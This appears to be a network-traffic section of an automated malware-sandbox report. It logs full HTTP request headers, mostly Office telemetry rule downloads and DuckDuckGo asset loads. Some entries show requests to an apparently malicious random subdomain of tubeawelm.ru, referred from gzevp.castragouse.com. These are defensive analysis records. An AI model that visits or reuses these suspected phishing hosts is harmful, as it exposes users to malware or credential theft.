Source: global trafficHTTP traffic detected: GET /rules/rule701151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700400v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700401v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703901v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703351v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703350v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703501v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703500v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/1819495637:1728354383:M-redJsW91GS6qXYC0LkAlTsXA_9cOUjmZbLsRsW5HU/8cf2ed9a6c2641de/91fa21b380c2c82 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /6724103732481834739iDJKxIdVFTASTOCRUBILTNCEMENYUDAFTOTURFRKJQVELOZMJKP HTTP/1.1Host: lri6b1umemgszfi00nujmsmxbqoeslw3wxut4nn41dsqeziifnhslitil0jq.tubeawelm.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://gzevp.castragouse.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://gzevp.castragouse.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule702301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703401v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703400v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: duckduckgo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://gzevp.castragouse.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule700500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /6724103732481834739iDJKxIdVFTASTOCRUBILTNCEMENYUDAFTOTURFRKJQVELOZMJKP HTTP/1.1Host: lri6b1umemgszfi00nujmsmxbqoeslw3wxut4nn41dsqeziifnhslitil0jq.tubeawelm.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule702551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /static-assets/font/ProximaNova-RegIt-webfont.woff2 HTTP/1.1Host: duckduckgo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://duckduckgo.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://duckduckgo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule701350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /_next/static/css/681db936aa729d59.css HTTP/1.1Host: duckduckgo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://duckduckgo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/css/335c19410475e349.css HTTP/1.1Host: duckduckgo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://duckduckgo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/css/7cfb7e019667ac45.css HTTP/1.1Host: duckduckgo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://duckduckgo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/css/e129782d9e96eedb.css HTTP/1.1Host: duckduckgo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://duckduckgo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /static-assets/font/ProximaNova-ExtraBold-webfont.woff2 HTTP/1.1Host: duckduckgo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://duckduckgo.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://duckduckgo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule703001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /static-assets/font/ProximaNova-Reg-webfont.woff2 HTTP/1.1Host: duckduckgo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://duckduckgo.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://duckduckgo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule703000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /static-assets/font/ProximaNova-Sbold-webfont.woff2 HTTP/1.1Host: duckduckgo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://duckduckgo.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://duckduckgo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /static-assets/font/ProximaNova-Bold-webfont.woff2 HTTP/1.1Host: duckduckgo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://duckduckgo.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://duckduckgo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/webpack-729a400fd7e48c20.js HTTP/1.1Host: duckduckgo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://duckduckgo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule703450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/framework-f8115f7fae64930e.js HTTP/1.1Host: duckduckgo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://duckduckgo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule703451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/main-d4b13818a262f8be.js HTTP/1.1Host: duckduckgo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://duckduckgo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/pages/_app-a22172a0a3988563.js HTTP/1.1Host: duckduckgo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://duckduckgo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule700901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/41966-c9d76895b4f9358f.js HTTP/1.1Host: duckduckgo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://duckduckgo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/43965-635afa8829c6b3d7.js HTTP/1.1Host: duckduckgo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://duckduckgo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/49224-2de3d7ae3b973557.js HTTP/1.1Host: duckduckgo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://duckduckgo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/webpack-729a400fd7e48c20.js HTTP/1.1Host: duckduckgo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/81125-b74d1b6f4908497b.js HTTP/1.1Host: duckduckgo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://duckduckgo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/53343-e1b28b68883ff9df.js HTTP/1.1Host: duckduckgo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://duckduckgo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/main-d4b13818a262f8be.js HTTP/1.1Host: duckduckgo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/framework-f8115f7fae64930e.js HTTP/1.1Host: duckduckgo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule702650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
